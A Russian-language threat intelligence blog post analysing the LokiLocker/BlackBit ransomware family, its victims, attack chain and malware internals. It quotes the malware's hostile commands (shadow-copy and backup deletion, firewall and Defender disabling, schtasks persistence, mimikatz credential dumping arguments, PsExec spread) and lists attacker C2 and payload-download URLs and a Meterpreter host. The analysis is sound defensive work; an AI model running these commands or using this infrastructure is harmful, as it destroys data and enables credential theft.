За прошедший год количество атак на российские компании с использованием программ-вымогателей выросло не менее чем на треть по сравнению с позапрошлым годом. К наиболее активным в России шифровальщикам Phobos, Dharma, CryLock и другим прибавились программы-вымогатели на основе Babuk, Conti и LockBit. Эти шифровальщики преимущественно использовались для атак на западные компании, однако публикация в открытом доступе исходных кодов Babuk и Conti, а также билдера LockBit 3 Black привела к обратному эффекту. В период геополитической напряженности эти программы-вымогатели стали «оружием» в руках как хактивистов, так и киберпреступников. Параллельно ранее известные семейства программ-вымогателей, которые были достаточно редкими в России, стали все чаще использоваться для атак на российские организации. Одним из таких семейств является LokiLocker. Именно ему мы решили посвятить этот блог, а особый акцент сделаем на его подсемействе — BlackBit, которое активно используется в атаках на российский и белорусский бизнес.
Профайл вымогателей, работающих с шифровальщиками LokiLocker/BlackBit
Специализация | Вымогательство выкупа у жертв за расшифровку данных |
Жертвы | Компании малого и среднего бизнеса по всему миру. 44% от общего числа атак, по нашим оценкам, приходится на Россию и Белоруссию. |
Сумма выкупа | $10000 – $100000
Сумма выкупа зависит от количества приобретаемых жертвой декрипторов (один декриптор расшифровывает данные на одном хосте) |
Период активности | С лета 2021 года по настоящее время |
Начальный вектор атаки | Скомпрометированные службы удаленного доступа |
Программа-вымогатель | Программа-вымогатель представляет собой обфусцированную .NET сборку. Программа-вымогатель имеет широкие функциональные возможности |
Особенности | Программа-вымогатель не шифрует файлы на компьютерах с установленным персидским языком
Осуществляется шифрование только Windows-систем и, чаще всего, в выходные дни. Программы-вымогатели предоставляются партнерам в рамках партнерской программы (RaaS, Ransomware-as-a-Service). Атакующие не похищают данные жертвы, соответственно не имеют сайт утечек (DLS). В качестве канала взаимодействия жертвы с атакующими используется электронная почта и Telegram. По истечении 30-дневного срока выплаты выкупа программа-вымогатель уничтожает все данные в скомпрометированной системе |
«Принц Персии»: несколько слов о семействе LokiLocker
Первые программы-вымогатели LokiLocker появились летом 2021 года, нашим криминалистам довелось впервые столкнуться с программой-вымогателем семейства LokiLocker, а точнее, с результатами ее использования в марте 2022 года. От атаки пострадала компания в одной из стран Ближнего Востока. В следующем инциденте жертва оказалась также связана с Ближним Востоком. В дальнейшем география жертв стала расширяться, атаки с использованием LokiLocker стали фиксироваться по всему миру. Среди пострадавших оказались, в том числе и российские компании.
В сентябре 2022 года появилось подсемейство BlackBit, которое стало активно использоваться для атак на средний и малый бизнес в России. Программы BlackBit по функциональным характеристикам практически идентичны LokiLocker, отличие лишь в нейминге: для зашифрованных файлов стало использоваться расширение «.BlackBit» (реже используются и другие расширения) и в записках с требованием выкупа стало указываться «Black Bit» вместо «Loki Locker«. Но, по сути, это идентичные программы-вымогатели.
При «первом знакомстве» программа-вымогатель LokiLocker показалась экспертам довольно странной и не похожей на другие. Например, при запуске программа проверяет установленные языки ввода. Если среди них установлен персидский язык (Persian), программа завершает свою работу. Также необычным является способ конфигурирования программы-вымогателя с помощью параметров, перечисленных в текстовом файле, а не с помощью, например, аргументов командной строки. Кроме того, программа-вымогатель имеет функционал по уничтожению данных на скомпрометированной системе по истечении срока выплаты выкупа, который обычно составляет 30 суток с момента первого запуска вымогателя.
В марте 2022 года ресерчеры компании BlackBerry опубликовали результаты исследования нового семейства программ-вымогателей LokiLocker, атакующих Windows-системы. В начале своего блога ресерчеры предположили, что проверка языка ввода в программе-вымогателе сделана специально авторами для проведения атак «под чужим флагом», чтобы обвинения падали якобы на злоумышленников, имеющих иранское происхождение. Однако в заключении авторы блога уже поставили под сомнение свои же первоначальные предположения.
Программы-вымогатели LokiLocker предоставляются для использования по партнерской программе (RaaS, Ransomware-as-a-Service), которая носит достаточно закрытый характер. Вначале в андеграунде фигурировали редкие сообщения по набору в LokiLocker RaaS, но общение велось не публично. Действительно, в первых атаках в записках с требованием выкупа указывались никнеймы, которые можно было найти в профильных группах Telegram на персидском языке, а также применялись утилиты, например, брутеры паролей, использующие в своем интерфейсе персидский язык.
Сейчас ясности в вопросе национальной принадлежности злоумышленников, использующих LokiLocker / BlackBit в своих атаках, у экспертов стало еще меньше. Глобализация коснулась и киберпреступности, и она давно уже стала международной. К слову сказать, в первой атаке, которую мы упоминали выше, использовалась программа LokiLocker с идентификатором атакующих – «Sklad«.
Для проведения атак владельцы RaaS компилируют партнерам программу-вымогатель, в которой указываются идентификатор атакующих и один или два адреса электронной почты для взаимодействия с жертвой. Коммуникация жертвы со злоумышленниками после шифрования данных осуществляется по электронной почте, в некоторых образцах BlackBit в записке с требованием выкупа может дополнительно указываться чат в Telegram. Имя собранной для партнеров программы соответствует первому адресу электронной почты, например: RickyMonkey@onionmail.org.exe
Некоторые образцы программ-вымогателей используются злоумышленниками в атаках в различных регионах. Так, например, программа-вымогатель, замеченная в атаке на одну из российских компаний, применялась тремя месяцами ранее в атаке в другой стране.
Для партнеров BlackBit создан портал «Black Bit Premium» (рис. 1), этот ресурс также используется программами-вымогателями BlackBit для загрузки на скомпрометированную систему публичного ключа RSA (криптографический алгоритм с открытым ключом).
Стоит отметить, что во всех выявленных образцах BlackBit используется один и тот же набор мастер-ключей RSA. Напротив, в образцах LokiLocker, которые мы выявили за прошедший год, содержится 6 различных наборов мастер-ключей RSA.
До конца не очевиден смысл создания подсемейства BlackBit. Некоторые партнеры с одинаковыми идентификаторами и адресами электронной почты встречаются в образцах программ-вымогателей BlackBit и LokiLocker одного периода времени, например:
BlackBit | LokiLocker |
decrliv
decrliv@aol.com decliv@aol.com |
decrliv
decrliv@aol.com decliv@aol.com |
Lastsmile
Filesupport@airmail.cc unlockerhelp@onionmail.org |
last
Filesupport@airmail.cc unlockerhelp@onionmail.org |
Возможно, BlackBit – премиальная партнерская программа, и появление BlackBit связано с перераспределением внутри RaaS или другими внутренними процессами.
Внимание на Россию: жертвы LokiLocker / BlackBit в мире
Поскольку партнеры, использующие LokiLocker / BlackBit, не были замечены за хищением данных у жертв, у них нет сайта для публикации украденных данных (DLS, Data Leak Site). В связи с этим представляется затруднительным оценить в полной мере масштабы и географию всех их атак. Тем не менее криминалисты F.A.C.C.T. смогли собрать информацию о жертвах LokiLocker / BlackBit, основываясь как на данные, полученные в результате реагирований на инциденты, так и данных из портала VirusTotal. Представленная ниже статистика охватывает период с апреля 2022 года по настоящее время.
Россия | 11 (BlackBit) |
10 (LokiLocker) | |
Барнаул | 1 (BlackBit) |
1 (LokiLocker) | |
Иркутск | 1 (BlackBit) |
Истра | 1 (BlackBit) |
Казань | 1 (BlackBit) |
Краснодар | 1 (BlackBit) |
Красноярск | 1 (BlackBit) |
Ленинск-Кузнецкий | 1 (LokiLocker) |
Липецк | 1 (BlackBit) |
Москва | 3 (BlackBit) |
4 (LokiLocker) | |
Новосибирск | 1 (LokiLocker) |
Санкт-Петербург | 1 (BlackBit) |
2 (LokiLocker) | |
Ульяновск | 1 (LokiLocker) |
Челябинск | 1 (LokiLocker) |
Белоруссия | 3 (BlackBit) |
3 (LokiLocker) | |
Барановичи | 1 (LokiLocker) |
Гомель | 1 (BlackBit) |
Минск | 2 (LokiLocker) |
Могилев | 2 (BlackBit) |
Европа | 11 (BlackBit) |
2 (LokiLocker) | |
Великобритания | 2 (BlackBit) |
Венгрия, Вац | 1 (BlackBit) |
Германия | 1 (BlackBit) |
1 (LokiLocker) | |
Испания, Вильянуэва-де-ла-Каньяда | 1 (BlackBit) |
Италия, Лумедзане | 1 (BlackBit) |
Нидерланды | 1 (BlackBit) |
Украина, Белая Церковь | 1 (BlackBit) |
Украина, Киев | 1 (BlackBit) |
Украина, Одесса | 1 (BlackBit) |
Франция | 1 (BlackBit) |
Чехия, Прага | 1 (LokiLocker) |
Азия | 3 (BlackBit) |
6 (LokiLocker) | |
Вьетнам, Ханой | 1 (LokiLocker) |
Гонконг | 1 (BlackBit) |
Индия, Гувахати | 1 (BlackBit) |
Индия, Джайпур | 1 (LokiLocker) |
Индия, Мумбаи | 1 (LokiLocker) |
Индия, Сурат | 1 (LokiLocker) |
Индия, Ченнаи | 1 (BlackBit) |
Иран, Тебриз | 1 (LokiLocker) |
Китай, Пекин | 1 (LokiLocker) |
Африка | 1 (LokiLocker) |
ЮАР, Кейптаун | 1 (LokiLocker) |
Южная Америка | 1 (BlackBit) |
6 (LokiLocker) | |
Боливия, Ла-Пас | 1 (BlackBit) |
1 (LokiLocker) | |
Бразилия, Маринга | 1 (LokiLocker) |
Бразилия, Сан-Паулу | 1 (LokiLocker) |
Бразилия, Сантана-ди-Парнаиба | 1 (LokiLocker) |
Колумбия, Перейра | 1 (LokiLocker) |
Перу, Лима | 1 (LokiLocker) |
Северная Америка | 3 (BlackBit) |
1 (LokiLocker) | |
Канада, Ватерлоо | 1 (BlackBit) |
Мексика, Мехико | 1 (BlackBit) |
США, Нью-Йорк | 1 (BlackBit) |
США | 1 (LokiLocker) |
Как мы видим из таблицы выше, партнеры LokiLocker / BlackBit работают практически по всему миру, но при этом довольно пристальное внимание уделяют России и Белоруссии — на эти страны приходится порядка 44% от общего числа атак с использованием LokiLocker / BlackBit.
KillChain LokiLocker / BlackBit: описание типовой атаки
Получение первоначального доступа
В качестве начального вектора атак злоумышленниками используют преимущественно скомпрометированные службы удаленного доступа (T1133) и, прежде всего, это RDP (Remote Desktop Protocol). Доступ через публично доступный терминальный сервер является одной из самых популярных техник получения первоначального доступа к ИТ-инфраструктуре жертвы у киберпреступников, промышляющих вымогательством за восстановление зашифрованных данных.
Для получения доступа к терминальному серверу атакующие могут использовать подбор имени пользователя и пароля (T1110). Также корректные учетные данные (T1078) могут быть приобретены злоумышленниками у других злоумышленников, например, в андеграунде у брокеров начального доступа.
Подготовка к развитию атаки
Получив первоначальный доступ, атакующие копируют на скомпрометированный хост набор инструментов или его часть (T1105), а также стремятся закрепиться и получить доступ к привилегированным учетным данным, чтобы получить возможность продвигаться по сети.
Для получения привилегированных учетных данных атакующие используют популярную легитимную утилиту mimikatz (T1003). Также программа-вымогатель LokiLocker / BlackBit имеет в конфигурации параметр «mimikatz«, в соответствии с которым программа загружает на хост из сети интернет утилиту mimikatz и запускает ее со следующими аргументами командной строки:
LOG_NAME – случайное имя файла отчета.
Для получения списка пользователей в Active Directory (T1087) некоторые партнеры пользовались .NET утилитой LoginParser (LoginParser.exe).
Для подбора паролей к учетным данным (T1110) атакующие используют различные сборки .NET утилиты AccountRestore (AccountRestore.exe, AccountRestore 2.exe)
Некоторые партнеры использовали утилиты NirSoft для извлечения паролей (https://www.nirsoft.net/password_recovery_tools.html):
- CredentialsFileView (CredentialsFileView.exe) (T1555.004);
- OperaPassView (OperaPassView.exe), WebBrowserPassView (WebBrowserPassView.exe) (T1555.003);
- RouterPassView (RouterPassView.exe) (T1552.001);
- VNCPassView (VNCPassView.exe) (T1552.002);
- PstPassword (PstPassword.exe) (T1552.001).
Сбор информации об ИТ-инфраструктуре
Для разведки сети атакующие используют следующие сетевые сканеры:
- Advanced Port Scanner (https://www.advanced-port-scanner.com/) (Advanced_Port_Scanner_2.5.3869.exе);
- SoftPerfect Network Scanner (https://www.softperfect.com/products/networkscanner/) (nasp.exe);
Атакующие используют различные версии консольной утилиты NS (NS.exe, 5-NS.exe) (рис. 2) для сканирования общих ресурсов сети (Shares) (T1135) и подключения их как сетевых дисков, а также монтирования скрытых томов. Ранее такие утилиты встречались в атаках с использованием программы-вымогателя Dharma.
Для поиска файлов и папок атакующие использовали утилиту Everything (ET.exe). Это производилось, прежде всего, для поиска аутентификационных данных, сохраненных в текстовых файлах (T1552).
Также злоумышленники просматривали файлы-документы на хостах, но не похищали их. Предположительно, это делалось для оценки платежеспособности жертвы и определения суммы выкупа.
Продвижение по сети
Для продвижения по сети партнеры используют RDP (T1021.001) и учетные данные, которые были похищены или получены в результате успешного перебора паролей (brute force) (T1110).
Подготовка к развертыванию программы-вымогателя
Атакующие предварительно отключают антивирусное программное обеспечение до развертывания программы-вымогателя (T1562.001). Некоторые образцы программ-вымогателей LokiLocker / BlackBit неоднократно используются в атаках, эти образцы после первых атак могут быть загружены на портал VirusTotal, онлайн-песочницы и т.п., тем самым, информация о данных программах зачастую уже имеется в Windows Defender и антивирусных продуктах. Также «поведение» в системе программ-вымогателей LokiLocker / BlackBit давно известно многим антивирусным программам и EDR. Все это вынуждает злоумышленников предварительно нейтрализовывать установленные в скомпрометированной системе средства безопасности.
Для нейтрализации средств безопасности атакующие могут использовать следующие легитимные утилиты:
- Process Hacker (PH.exe);
- KAV Removal Tool (KAVREMVR.exe);
- ESET AV Remover (avremover_nt32_enu.exe, avremover_nt64_enu.exe);
- IObit Unlocker (unlocker-setup.exe);
- Revo Uninstaller (RevoUninProSetup.exe).
Развертывание программы-вымогателя
Распространение программы-вымогателя по ИТ-инфраструктуре жертвы производилось атакующими преимущественно вручную (T1570).
При расследовании атаки на одну из российских компаний был выявлен запуск злоумышленниками старого файлового вируса Neshta. Впоследствии были выявлены еще несколько образцов программ-вымогателей LokiLocker / BlackBit из атак в других странах, также инфицированных вирусом Neshta. Возможно, атакующие использовали инфицированный инструмент, либо вирус использовался в качестве оригинального способа противодействия средствам безопасности.
В большинстве случаев шифрование данных жертвы производилось в выходные дни. Продолжительность атак с использованием программ-вымогателей LokiLocker / BlackBit составляет, по нашим оценкам, от суток до нескольких дней.
Для расшифровки данных для каждого хоста требуется свой декриптор, злоумышленники берут оплату за расшифровку в зависимости от количества хостов, которые требуется расшифровать.
Анализ программы-вымогателя BlackBit
Программа-вымогатель LokiLocker / BlackBit представляет собой сборку .NET (v4.0.30319), разработанную на языке программирования C#. Исполняемый файл программы-вымогателя имеет формат PE32, крайне редко – PE32+.
Все образцы LokiLocker / BlackBit обфусцированы. Ранее для обфускации LokiLocker использовался протектор NETGuard с использованием плагина виртуализации KoiVM v0.2.0-custom. Для всех образцов BlackBit используется один и тот .NET обфускатор. Этот же обфускатор также используется для половины образцов LokiLocker и вспомогательных утилит. Примечательно, что после обфускации данный протектор устанавливает в защищенных образцах значение временной метки PE (PE timestamp), равное 5000A574h, что соответствует 2012-07-13 22:47:16 (UTC), и значение контрольной суммы, равное 0x00023BFB.
Ранее уже было сказано, что при запуске программа-вымогатель проверяет на скомпрометированной системе установленные языки ввода. Если установлен персидский язык (Persian), программа завершает свою работу. Также в коде программы содержится строка «Iran«.
При запуске LokiLocker возможно указать аргумент командной строки «log«, чтобы программа создавала текстовый файл отчета «logs.txt» в текущем каталоге. Однако в BlackBit такая возможность отсутствует.
Программа осуществляет попытку открытия в текущем каталоге текстового файла конфигурации «loki.txt» (описание параметров конфигурации приведено ниже). В некоторых последних образцах BlackBit для файла конфигурации используется имя «b.txt«. Если данный файл существует, он копируется в каталог «%AllUsersProfile%«:
Если в конфигурационном файле «%AllUsersProfile%\config.BlackBit» не указан параметр отключения автозапуска «nostartup«, программа осуществляет следующие действия:
- создает копии своего исполняемого файла в каталоге Startup текущего пользователя под именем «winlogon.exe» и под случайным именем;
- копирует свой исполняемый файл в каталог «%AppData%«:
%AppData%\winlogon.exe - создает задачу планировщика:
schtasks /CREATE /SC ONLOGON /TN BlackBit /TR %AppData%\winlogon.exe /RU SYSTEM /RL HIGHEST /F - копирует свой исполняемый файл в каталог %AllUsersProfile%:
%AllUsersProfile%\winlogon.exe - создает следующий параметр в системном реестре:
[HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Invoke]
«Michael Gillespie»=»%AllUsersProfile%\winlogon.exe» - копирует свой исполняемый файл в каталог CommonStartup под именем «winlogon.exe«;
- копирует свой исполняемый файл в каталог «%Windows%«:
%Windows%\winlogon.exe - создает параметр в системном реестре:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Invoke]
«Michael Gillespie»=»%Windows%\winlogon.exe» - извлекает в каталог Startup текущего пользователя пакетный файл «wvtymcow.bat» со следующим содержимым:
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Далее программа извлекает файл с иконкой, которую ассоциирует в системе с расширением зашифрованных файлов «.BlackBit«. Также программа извлекает HTA-файл «%AllUsersProfile%\info.BlackBit» с требованием выкупа за расшифровку и таймером отсчета времени выплаты, компилирует с помощью Csharp содержащийся в теле программы исходный код на C# в EXE-файл со случайным именем в каталог «%AllUsersProfile%«. Данный EXE-файл при запуске выводит сообщение о шифровании файлов (рис. 3) и открывает с помощью mshta.exe HTA-файл «%AllUsersProfile%\info.BlackBit«. Программа-вымогатель регистрирует указанный EXE-файл в реестре, как обработчик открытия файлов с расширением «.BlackBit«:
RND – случайное имя.
Программа-вымогатель проверяет наличие администраторских прав пользователя, при отсутствии пытается запустить свой исполняемый файл из-под администраторской учетной записи (runas). В случае неудачи, программа завершает свою работу.
Программа завершает следующие процессы:
wxserver | wxserverview | sqlservr | ragui |
supervise | culture | rtvscan | defwatch |
winword | qbw32 | qbdbmgr | qbupdate |
qbcfmonitorservice | axlbridge | qbidpservice | httpd |
fdlauncher | msdtsrvr | tomcat6 | zhudongfangyu |
vmware-usbarbitator64 | vmware-converter | dbsrv12 | msftesql |
sqlagent | sqlbrowser | sqlwriter | oracle |
ocssd | dbsnmp | synctime | agntsvc |
mydesktopqos | isqlplussvc | xfssvccon | mydesktopservice |
ocautoupds | agntsvc | agntsvc | agntsvc |
encsvc | firefoxconfig | tbirdconfig | ocomm |
mysqld | mysqld-nt | mysqld-opt | dbeng50 |
sqbcoreservice | excel | infopath | msaccess |
mspub | onenote | outlook | powerpnt |
steam | thebat | thebat64 | thunderbird |
visio | winword | wordpad |
Программа останавливает следующие системные службы:
defwatch | ccevtmgr | ccsetmgr | savroam |
sqlserv | sqlagent | sqladhlp | culserver |
rtvscan | sqlbrowser | sqladhlp | qbidpservice |
quickboooks.fcs | qbcfmonitorservice | sqlwriter | msmdsrv |
tomcat6 | zhundongfangyu | vmware-usbarbitator64 | vmware-converter |
dbsrv12 | dbeng8 | wrapper | mssqlserver |
mssql$contoso1 | msdtc | sqlserveragent | vds |
Для удаления теневых копий разделов, удаления резервных копий состояния системы, отключения восстановления в загрузочном меню Windows, а также для отключения брандмауэра Windows выполняет следующие команды:
vssadmin delete shadows /all /quiet wbadmin DELETE SYSTEMSTATEBACKUP wmic shadowcopy delete wbadmin delete catalog -quiet bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit /set {default} recoveryenabled no netsh advfirewall set currentprofile state off netsh firewall set opmode mode=disable
Также программа-вымогатель удаляет точки восстановления системы, очищает корзину и отключает Windows Defender с помощью изменения значений параметров реестра Windows:
[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection] "DisableBehaviorMonitoring"=REG:DWORD:1 "DisableOnAccessProtection"= REG:DWORD:1 "DisableScanOnRealtimeEnable"= REG:DWORD:1 [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender] "DisableAntiSpyware"= REG:DWORD:1
Далее программа-вымогатель с помощью функций WinInet API направляет HTTP-запрос POST на ресурс злоумышленников «http://application-api.xyz/api/index.php» (User-Agent: «BlackBit/1.0«) со следующими данными:
unique-id={ID}&disk-size={DISK_SIZE}&user={USER}&cpu-name={CPU_NAME}&ram-size={RAM_SIZE}&os-name={OS_NAME}
- ID – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0;
- DISK_SIZE – размер диска;
- USER – идентификатор атакующих (имя пользователя партнерского портала);
- CPU_NAME – название процессора;
- RAM_SIZE – размер оперативной памяти;
- OS_NAME – название и версия операционной системы.
В ответ программа получает данные в формате JSON, в которых содержится публичный ключ RSA, предназначенный для шифрования данных.
Если публичный ключ не удается загрузить с интернет-ресурса атакующих, программа создает пару ключей RSA-2048 с помощью класса .Net RSACryptoServiceProvider. Сгенерированный приватный ключ в формате XML, а также информация о системе шифруются с помощью содержащихся в теле программы публичных ключей RSA. В программе содержится 5 публичных ключей RSA: 4 публичных ключа RSA-4096 и 1 публичный ключ RSA-3072. Публичные ключи RSA-4096 используются для шифрования по частям приватного ключа в формате XML, а ключ RSA-3072 используется для шифрования информации о системе.
Информация о системе содержит следующие данные (рис. 4): идентификатор жертвы; размер диска; название процессора; размер оперативной памяти; временная зона; формат региона; внешний IP-адрес, полученный с помощью HTTP-запроса по ссылке «http://ip-api.com/json«; адреса электронной почты и идентификатор атакующих; логический результат проверки работоспособности функций Cryptography API: Next Generation (CNG) (0 или 1).
Общий размер указанных зашифрованных данных составляет 2 432 байта. Эти зашифрованные данные в кодировке Base64 сохраняются в файл «%AllUsersProfile%\Cpriv.BlackBit«. Также зашифрованные данные записываются в параметр системного реестра:
[HKCU\SOFTWARE\BlackBit] "full"= REG_BINARY:{ENC_PRIVKEY_DATA}
ENC_PRIVKEY_DATA – зашифрованные приватный ключ RSA-2048 и информация о системе.
Полученный или сгенерированный публичный ключ RSA, а также время окончания срока выплаты выкупа сохраняются в раздел реестра (рис. 5):
[HKCU\SOFTWARE\BlackBit] "public"= REG_BINARY:{ENC_PUBKEY_DATA} "timer"= REG_BINARY:{ENC_TIMER_DATA}
- ENC_PUBKEY_DATA – зашифрованный с помощью побайтовой операции XOR со значением 11h публичный ключ RSA-2048 в формате XML.
- ENC_TIMER_DATA – зашифрованная с помощью побайтовой операции XOR со значением 54h строка со временем окончания срока выплаты выкупа за расшифровку данных. Обычно время окончания срока выплаты соответствует времени спустя 30 суток после первого запуска программы-вымогателя на компьютере.
Если параметр системного реестра «public» существует, получение или генерация ключей RSA-2048 не осуществляется, программой используется ключ, извлеченный из указанного параметра реестра.
В последних выявленных образцах LokiLocker функциональность по загрузке публичного ключа RSA с ресурса злоумышленников не используется, пара ключей RSA генерируются непосредственно на компьютере.
Шифрование файлов
Программа-вымогатель осуществляет многопоточное шифрование файлов на всех дисках и на доступных сетевых ресурсах. Перед шифрованием LokiLocker монтирует скрытые тома, однако BlackBit этого не осуществляет.
Программа-вымогатель не шифрует файлы в каталогах с установленным атрибутом «системный», а также в следующих каталогах:
%Windows% %SystemDrive%\EFI %SystemDrive%\$Recycle.Bin
Программа-вымогатель не шифрует свои файлы: файлы с расширениями «.BlackBit» и с именами «Restore-My-Files.txt«, «info.hta«.
По умолчанию, если не установлен параметр «full«, не шифруются файлы со следующими расширениями:
«.exe«, «.dll«, «.msi«, «.com»
В некоторых образцах BlackBit параметр «full» не используется, в этом случае осуществляется шифрование всех файлов.
Файлы размером до 1 572 864 байт шифруются полностью. В файлах большего размера шифруются 3 блока по 256 килобайт: в начале, конце и середине файла. Шифрование содержимого файлов производится с помощью алгоритма шифрования AES-256 GCM (Galois/Counter Mode), реализованного с помощью функций CNG API. Генерация 32-байтного ключа и 12-байтного nonce осуществляется с помощью функции CNG API BCryptGenRandom. Ключ и nonce шифруются с помощью сгенерированного или загруженного публичного ключа RSA-2048 и дописываются в конец зашифрованного файла (256 байт).
Зашифрованные файлы именуются следующим образом:
- EMAIL1 – первый адрес электронной почты атакующих.
- ID – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0.
- FILENAME – оригинальное имя файла.
Реже в некоторых образцах для зашифрованных файлов используются другие расширения, например, «.KTBR» и «.onion700«.
В каждом обработанном каталоге вымогатель создает текстовые файлы Restore-My-Files.txt с требованием выкупа (рис. 6).
Если ключи были сгенерированы на компьютере, на каждом диске создаются файлы Cpriv.BlackBit, и в этом случае в текстовые файлы Restore-My-Files.txt добавляется следующая строка:
!!!Deleting «Cpriv.BlackBit» causes permanent data loss.
Для зашифрованных томов вымогатель устанавливает метку «Locked by BlackBit«.
На каждом диске программа-вымогатель создает файлы info.hta (рис. 7).
Программа изменяет обои рабочего стола (рис. 8).
Также программа помещает текст с информацией о шифровании файлов на экран входа пользователя в систему (рис. 9):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "legalnoticecaption"="Encrypted by BlackBit" "legalnoticetext"="All your important files have been encrypted. If you want to restore them, write us to the e-mail: {EMAIL1} Write this ID in the title of your message: {ID} In case of no answer in 24 hours write us to this e-mail: {EMAIL2}"
Также программа изменяет информацию Original Equipment Manufacturer (OEM) в системном реестре:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OEMInformation] "Manufacturer"="Encrypted by BlackBit" "SupportPhone"="All your important files have been encrypted. If you want to restore them, write us to the e-mail: {EMAIL1} Write this ID in the title of your message: {ID} In case of no answer in 24 hours write us to this e-mail: {EMAIL2}"
- EMAIL1 – первый адрес электронной почты атакующих.
- ID – идентификатор жертвы, соответствующий серийному номеру системного тома (8 шестнадцатеричных символов), либо серийному номеру жесткого диска #0.
- EMAIL2 – второй адрес электронной почты атакующих.
После завершения шифрования файлов для затруднения их восстановления LokiLocker запускает дефрагментацию всех томов с помощью команды:
defrag /C /H
В программах-вымогателях BlackBit запуск дефрагментации не осуществляется.
Уничтожение данных
Ранее мы уже говорили, что в значении параметра «timer» раздела реестра «HKCU\SOFTWARE\BlackBit» содержится зашифрованная строка (XOR 54h) со временем окончания срока выплаты выкупа, которое соответствует времени спустя 30 суток после первого запуска программы-вымогателя на компьютере.
Программа-вымогатель проверяет текущее время, если оно превышает указанное в параметре реестра «timer», программа удаляет все файлы и перезаписывает MBR жесткого диска #0 (PhysicalDrive0). При загрузке с указанного жёсткого диска после перезаписи MBR в этом случае будет отображаться текст (рис. 10).
Если в файле конфигурации указан параметр «nofuck«, то программа в этом случае лишь не блокирует запуск Task Manager путем изменения значения параметра «DisableTaskMgr» в системном реестре. Если программа запущена и текущее время превышает время ультиматума, то также будет произведено уничтожение данных.
Дополнительные функции
В некоторых образцах LokiLocker содержится полезная нагрузка Loki.Payload.dll в виде сборки .NET (v4.0.30319).
Данная полезная нагрузка при отсутствии файла «C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe«, загружает его по ссылке «http://imagesource.zapto.org/bin/vbc.exe«.
Также полезная нагрузка пытается загрузить данные по ссылке «http://imagesource.zapto.org/bin/win7.jpg«, из которых распаковывает и расшифровывает программный модуль. Если загрузить не удается, используется программный модуль, содержащийся в ресурсах полезной нагрузки.
Программный модуль внедряется в запущенный полезной нагрузкой процесс «C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe«.
В ресурсах полезной нагрузки находится программный модуль формата PE32 (EXE), содержащий код Meterpreter Shellcode Loader, который загружает Shellcode по адресу 157.90.17.53:7300 и передает ему управление.
Конфигурация программы-вымогателя
При запуске программа проверяет наличие файла конфигурации «loki.txt» в текущем каталоге, если файл существует, он копируется под именем %AllUsersProfile%\config.BlackBit. В некоторых последних образцах BlackBit для файла конфигурации используется имя «b.txt«.
Файл конфигурации представляет собой текстовый файл (рис. 11), в каждой строке которого могут содержаться параметры. Проверка строки с параметром осуществляется с учетом регистра.
Странно, что партнеры, которые используют в атаках BlackBit, не совсем осведомлены о параметрах конфигурации BlackBit. Вполне возможно, что параметры используются по привычке, полученной от использования LokiLocker. Представленный на рис. 11 пример взят из реальной атаки, при этом используемый в атаке образец BlackBit, игнорировал параметры «full» и «psexec» (см. ниже в таблице). В другой же атаке нам достался файл конфигурации, где были указаны параметры с первой заглавной буквой: «Clast«, «Nofuck«, «Psexec«.
Параметр | Описание |
nostartup | Не осуществлять автозапуск своего исполняемого файла |
update | Отобразить поддельное окно обновления Windows.
Для этого программа извлекает в каталог %Temp% HTA-файл под случайным именем и открывает его |
noprint | Отключает выполнение следующих действий программы-вымогателя:
1) Отключение настроек Windows Defender путем модификации следующих параметров реестра: [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender] «DisableAntiSpyware»=REG_DWORD:1 [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection] «DisableRealtimeMonitoring»=REG_DWORD:1 [HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet] «SubmitSamplesConsent»=REG_DWORD:1 2) Обновление групповых политик на компьютерах Active Directory с помощью команды: powershell.exe -Command «Get-ADComputer -filter * -Searchbase ‘%s’ | foreach{ Invoke-GPUpdate -computer $_.name -force -RandomDelayInMinutes 0} 3) Выключение монитора. В программах-вымогателях BlackBit действия 2 и 3 не осуществляются. |
justns | Шифровать файлы только на сетевых ресурсах |
mimikatz | Программа загружает утилиту mimikatz в зависимости от разрядности по ссылкам:
http://tb28.trainbit.com:8080/files/9727827484/v34832447675444A4C2B7263452F63516A6365445933624754316D58615165737857445172485352462F454D31386C4A5936532F6F31413D3D/x64.zip http://tb28.trainbit.com:8080/files/3727827484/v34832447675444A4C2B726538367672712B6973524D624149516541553132654362567742524D457354734165755678746134424777773D3D/Win32.zip Загруженная утилита запускается программой-вымогателем со следующими аргументами: «privilege::debug» «log {LOG_NAME}.txt» «sekurlsa::logonPasswords» «token::elevate» «lsadump::sam» exit LOG_NAME – случайное имя файла отчета. |
psexec | В программах-вымогателях BlackBit не используется.
Распространяться по локальной сети с использованием PsExec. Программа загружает утилиту PsExec в зависимости от разрядности по ссылкам: http://tb28.trainbit.com:8080/files/5950827484/v3445A707851454F445077337A374879564C75567470314B70456E75694E386741663961454A2B4A78374E744C324442523768766C59413D3D/x64.zip http://tb28.trainbit.com:8080/files/7450827484/v3445A707851454F445077334C646B6B45354D393061476A4F36327739645344422F752B436C7A744554712F43446A4B4571662B666B673D3D/Win32.zip Загруженная утилита запускается программой-вымогателем из-под администраторской учетной записи (runas) со следующими аргументами командной строки: -s \\{IP} «{RANSOM_APP_PATH}» IP – адрес хоста в локальной сети. RANSOM_APP_PATH – путь к исполняемому файлу программы-вымогателя. |
nons | Не шифровать файлы на сетевых ресурсах |
clast | Шифровать диск C последним. Если не указан параметр «nocdrive«, программа-вымогатель шифрует сначала важные файлы. Для поиска файлов для шифрования используются следующие специальные папки:
Favorites Recent Desktop Personal MyPictures MyVideos MyMusic При этом программа может извлекать пути к шифруемым файлам из файлов ярлыков (LNK-файлов). |
nocdrive | Не шифровать диск C |
